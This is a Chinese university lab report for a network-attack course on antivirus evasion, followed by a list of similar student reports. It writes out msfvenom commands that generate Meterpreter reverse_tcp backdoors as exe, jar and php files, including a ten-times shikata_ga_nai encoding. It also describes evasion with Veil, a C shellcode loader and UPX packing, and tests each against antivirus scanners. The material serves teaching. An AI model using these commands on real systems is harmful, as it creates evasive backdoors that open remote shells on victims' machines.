2018-2019-2 网络对抗技术 20165314 Exp3 免杀原理与实践

免杀原理与实践说明

一、实验说明

  • 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)
  • 任务二:通过组合应用各种技术实现恶意代码免杀(1分)
  • 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(1分)

    二、基础问题回答

  • 问:杀软是如何检测出恶意代码的?
    • 基于特征来检测:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。
    • 基于行为来检测:通过对恶意代码的观察、研究,有一些行为是恶意代码的共同行为,而且比较特殊。所以当一个程序在运行时,杀毒软件会监视其行为,如果发现了这种特殊的行为,则会把它当成恶意软件。
      *问:免杀是做什么?
    • 通过使用一些技术手段,让杀毒软件无法识别并分析主机中的恶意代码。
  • 问:免杀的基本方法有哪些?
    • 改变特征码:

      • 只有exe——加壳
      • 有shellcode——利用shellcode生成可执行文件
      • 有源代码——用其他语言重写再编译
    • 改变行为:
      • 通讯方式:尽量使用反弹式连接、使用隧道技术、加密通讯数据等。
      • 操作模式:基于内存操作、减少对系统的修改、加入混淆作用的正常功能代码等。

        任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

        1、在《Exp2:后门原理与实践》博客中,我们生成了一个后门文件。将其放在virscan.org中进行扫描,结果如下图所示:

        可以看出,39款杀软中有28款报出了病毒。原因也可想而知,Msfvenom是Metasploit平台下用来编码payloads免杀的工具。以Metaspliot的知名度和普及度,只要一有新编码算法,马上就会加到特征库里了。
        2、使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=xxx LPORT=xxx -f exe > met-encoded10.exe指令进行多次编码,再使用virscan.org进行扫描,结果如下所示:

        见鬼了,多次编码之后反而报毒的软件多了一款????可见单纯依靠多次编码之后的后门,还是会被大多数杀软发现并清理的。

        msfvenom生成jar文件

        生成java后门程序使用命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=5314 x> bd_java.jar生成文件如下所示:

        扫描结果如下:

        msfvenom生成php文件

        生成PHP后门程序使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=5314 x> 20165318_backdoor.php生成文件如下所示:

        扫描结果如下:

        使用veil-evasion生成后门程序及检测

        1、启动evil,选择evasion,指定payload为第七号即c/meterpreter/rev_tcp.py,选择设置好回连的IP地址和端口号后,生成后门文件:

        2、放到virscan.org上扫描一下:

        比之前用msf生成的文件报毒率低,但还是会被杀软检测出来。

        注入Shellcode并执行

        1、生成的shellcode如下图所示:

        2、利用shellcode编写一个C语言程序后门,在windows下编译运行后,测试其可用性:

        可以成功获取了windows权限。
        3、不过,还是会被杀毒软件发现。

        进行加壳尝试

  • 使用UPX对生成的后门程序加壳:
  • 扫描结果也比较乐观:

    7、测试仍然可用:

原文地址:https://www.cnblogs.com/zhangshuai9345/p/10624675.html

时间: 2024-08-30 12:47:05

2018-2019-2 网络对抗技术 20165314 Exp3 免杀原理与实践的相关文章

2017-2018-4 20155317《网络对抗技术》EXP3 免杀原理与实践

2017-2018-4 20155317<网络对抗技术>EXP3 免杀原理与实践 一.问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 2.实践 (1) 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 首先尝试一下自己上个实验做出的后门程序 果然是不堪一击...拿去检测一下 装上veil尝试一下结果会如何 : 温馨提示一下,刚开始我是用的自己装的64的ka

2018-2019-2 网络对抗技术 20165228 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 20165228 Exp3 免杀原理与实践 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的.AV(Anti-virus)是很大一个产业.其中主要的技术人员基本有编制恶意软件的经验. 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础. 1.杀软是如何检测出恶意代码的? 基于特征码:杀软会将恶意代码中有明显特征的一部分作为特征码,并建立起特征库,在

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践 **免杀** - 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. - 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的.AV(Anti-virus)是很大一个产业.其中主要的技术人员基本有编制恶意软件的经验. - 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础. 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,vei

20165101刘天野 2018-2019-2《网络对抗技术》Exp3 免杀原理与实践

20165101刘天野 2018-2019-2<网络对抗技术>Exp3 免杀原理与实践 1. 实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧 1.1.1 使用msf编码器 输入命令msfvenom -h可查看相关用法: 编码一次命令如下(用-e参数编码 用-b参数去除坏字符'\00'): msfvenom -p windows/meterpreter/reverse_tcp -e x8

2019-2020-2 20175215丁文韬《网络对抗技术》Exp3 免杀原理与实践

一.恶意代码检测机制和免杀原理 由于老师实验指导书中有提到了,这部分内容不加赘述,只是提及一下. 1.恶意代码检测机制 1.1 基于特征码的检测 简单来说一段特征码就是一段或多段数据.如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. 1.2 启发式恶意软件检测 "When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird

2019-2020-2 网络对抗技术 20175209 Exp3 免杀原理与实践

2019-2020-2 网络对抗技术 20175209 Exp3 免杀原理与实践 一.实验任务 方法 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳工具 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.基础问题回答 杀软是如何检测出恶意代码的 基于

2019-2020-2 20175226王鹏雲《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175226王鹏雲<网络对抗技术>Exp3 免杀原理与实践 实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具.使用C + shellcode编程或使用其他课堂未介绍方法自己利用shellcode编程等免杀工具或技巧 2.通过组合应用各种技术实现恶意代码免杀 (如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图.) 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明

2019-2020-2 20175334罗昕锐《网络对抗技术》Exp3 免杀原理与实践

2019-2020-2 20175334罗昕锐<网络对抗技术>Exp3 免杀原理与实践 1 实践说明 1.1实践内容 (1)正确使用msf编码器 (2)veil (3)加壳工具 (4)使用C + shellcode编程 (5)使用其他课堂未介绍方法 -(6)通过组合应用各种技术实现恶意代码免杀并用另一电脑实测,在杀软开启的情况下,可运行并回连成功 1.2基础知识 1.2.1免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术 要做好免杀,就时清楚杀毒软件(恶意软

2019-2020-2 20175218陈敬勇 《网络对抗技术》 Exp3 免杀原理与实践

2019-2020-2 20175218陈敬勇 <网络对抗技术> Exp3 免杀原理与实践 一.实验任务 方法 正确使用msf编码器 msfvenom生成如jar之类的其他文件 veil 加壳工具 使用C + shellcode编程 使用其他课堂未介绍方法 通过组合应用各种技术实现恶意代码免杀 如果成功实现了免杀的,简单语言描述原理,不要截图.与杀软共生的结果验证要截图 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 二.实验准备 基础知识 Msfvenom使用